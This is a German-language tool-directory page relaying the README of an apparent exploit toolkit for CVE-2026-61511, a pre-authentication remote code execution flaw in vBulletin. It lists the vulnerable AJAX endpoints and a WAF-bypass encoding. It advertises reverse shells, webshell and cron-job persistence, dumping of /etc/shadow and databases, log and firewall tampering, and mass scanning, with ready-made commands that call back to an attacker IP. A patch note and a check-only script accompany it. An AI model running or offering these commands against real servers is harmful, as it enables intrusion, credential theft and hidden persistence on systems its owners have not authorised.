Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Schwachstelle 5.x/6.x (ungepatcht). Multi-Exploit über Endpoint Pool, AJAX, PHPFuck WAF-Bypass. Vollständiges Toolkit: Reverse Shell, Proxy, Persistenz, Webshell, Datenbankoperationen, Firewall-Steuerung, Log-Verwaltung, Massen-Scanning. 2 Versionen: Multi-Exploit & Safe-Check. Python 3.8+ Nutze es ethisch, bleib legal. 🔒 | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
NetzwerkkartierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWAF-UmgehungPenetrationstestsRemote-Access-ToolPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Datenbanksicherheit
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Repository anzeigen
423vor 1 MonatNoch nicht geprüft

Über

CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Schwachstelle 5.x/6.x (ungepatcht). Multi-Exploit über Endpoint Pool, AJAX, PHPFuck WAF-Bypass. Vollständiges Toolkit: Reverse Shell, Proxy, Persistenz, Webshell, Datenbankoperationen, Firewall-Steuerung, Log-Verwaltung, Massen-Scanning. 2 Versionen: Multi-Exploit & Safe-Check. Python 3.8+ Nutze es ethisch, bleib legal. 🔒

Teilen

CVEPoC

CVE-2026-61511 – vBulletin Pre‑Auth RCE Exploit & Verifier

Python 3.8+ CVSS Author vBulletin

⚠️ NUR ZUR ETHISCHEN NUTZUNG – AUTORISIERTE SICHERHEITSTESTS
Dieses Repository stellt Werkzeuge ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit.
Unautorisierter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.


📖 Schwachstellenübersicht

CVE‑2026‑61511 ist eine PHP-eval()-Injection-Schwachstelle in der AJAX-Template-Rendering-Engine von vBulletin.
Betroffene Versionen: 5.0.0 – 5.7.5 und 6.0.0 – 6.2.1.

So funktioniert es

  1. Mehrere Angriffs-Endpunkte – der Fehler existiert in mehreren AJAX-Handlern:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Verschiedene /ajax/api/content_* /getIndexableContent-Endpunkte
  2. PHPFuck-Kodierung – die Payload wird in eine Sequenz von PHP-Operatoren und Zahlen umgewandelt, die WAF-Filter umgeht und die Ausführung beliebigen PHP-Codes ermöglicht.

  3. Keine Authentifizierung erforderlich – ein Angreifer kann eine manipulierte POST-Anfrage an einen beliebigen verwundbaren Endpunkt senden und Systembefehle mit den Rechten des Webservers ausführen.

  4. Auswirkung – vollständige Serverkompromittierung, Datendiebstahl, Backdoors, laterale Bewegung und Persistenz. Version aktualisieren!

Patch

  • vBulletin 6.2.2 und Patch Level 1 für ältere Versionen beheben dieses Problem.
  • Immer auf die neueste Version aktualisieren.

🧰 Werkzeuge

WerkzeugZweckZielgruppe
exploit.pyVollständiges Toolkit mit Reverse Shell, Persistenz, Dateioperationen, Datenbank-Dump, Firewall-Verwaltung, Log-Verwaltung, Portweiterleitung, SSH-Key-Bereitstellung, Netzwerkscanning und Massenscanning (multithreaded).Red Teams / autorisierte Pentester
safecheck.pyNicht-intrusiver Verifier, der die Schwachstelle ohne Ausführung bösartiger Payloads prüft. Erkennt die Version, testet alle Endpunkte und erstellt einen detaillierten Bericht.Blue Teams / Sicherheitsauditoren

📊 Funktionsvergleich

Funktionexploit.pysafecheck.py
Schwachstellenerkennung✅✅
Versionserkennung✅✅
Multi-Endpunkt-Tests (18 Pfade)✅✅
Befehlsausführung✅❌
Reverse Shell✅❌
Datei-Upload/-Download✅❌
Persistenzmechanismen✅❌
Web-Shell-Bereitstellung✅❌
Datenbankoperationen✅❌
Systeminformationssammlung✅✅
Firewall-Verwaltung✅❌
Log-Verwaltung✅❌
Portweiterleitung✅❌
SSH-Key-Bereitstellung✅❌
Netzwerkscanning✅❌
Massenscanning (multithreaded)✅❌
Proxy-Unterstützung✅✅
JSON-Berichtsausgabe✅✅
Interaktives Menü✅❌
Nicht-intrusiver (sicherer) Modus❌✅
Verbose/Debug-Modus✅✅
Benutzerdefinierte Befehlsausführung✅❌
Multi-Befehl-Verkettung✅❌
Remote-Dateilesen✅❌
Remote-Dateischreiben✅❌
Systembenutzerverwaltung✅❌
Firewall-Bypass-Techniken✅❌
WAF-Umgehung (PHPFuck)✅✅

🎯 Anwendungsfall-Zusammenfassung

SzenarioEmpfohlenes Werkzeug
Blue Team – Überprüfung, ob Ihre vBulletin-Installation verwundbar istsafecheck.py
Sicherheitsaudit – nicht-intrusive Schwachstellenbewertungsafecheck.py
Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzungexploit.py
Bug Bounty – verantwortungsvolle Offenlegungstestssafecheck.py
Massenscanning – Überprüfung mehrerer Ziele auf Schwachstellenexploit.py (nur Erkennung)
Incident Response – Überprüfung, ob Systeme kompromittiert sindsafecheck.py

⚙️ Installation

git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Inhalt von requirements.txt:

request
urllib3

Parameter 🌬️

ParameterBeschreibung
-t, --targetZiel-URL (z. B. http://forum.com/vb)
--proxyHTTP-Proxy (z. B. http://127.0.0.1:8080)
--timeoutRequest-Timeout in Sekunden (Standard: 10)
--retryWiederholungsanzahl pro Pfad (Standard: 3)
--outputDetaillierten Bericht als JSON-Datei speichern
-v, --verboseAusführliche Ausgabe
-q, --quietRuhiger Modus (minimale Ausgabe)
--lhostErforderlich für Exploit – IP für Callback
--lportPort für Callback (Standard: 4444)
--threadsThreads für Massenscanning (Standard: 5)
--exploitAusnutzung nach Erkennung durchführen
--fullVollständiger Angriff (alle Module)
--shellReverse Shell starten
--webshellWebshell installieren (/shell.php)
--persistPersistenz installieren (Cron-Job)
--dumpDatenbank dumpen
--dump-credsAnmeldedaten dumpen (/etc/passwd, /etc/shadow)
--interactiveInteraktives Menü nach erfolgreicher Verifizierung

Szenarien

#SzenarioBefehl
1Schneller Schwachstellencheckpython safecheck.py -t http://target.com/vb
2Detaillierter Scan mit Berichtpython safecheck.py -t http://target.com/vb --output report.json -v
3Reverse Shellpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Vollständiger Angriff (alle Module)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Massenscanning aus Dateipython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Interaktiver Menümoduspython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive

Endpunkt-Pool 🅿️

#Endpunkt
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent

🛡️ Verantwortungsvolle Nutzung

  • Verwenden Sie diese Werkzeuge nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unautorisierter Zugriff ist illegal und unethisch.
  • Die Autoren sind nicht für jeglichen Missbrauch verantwortlich.
  • Befolgen Sie stets die Gesetze und Vorschriften Ihres Landes.
Tool herunterladen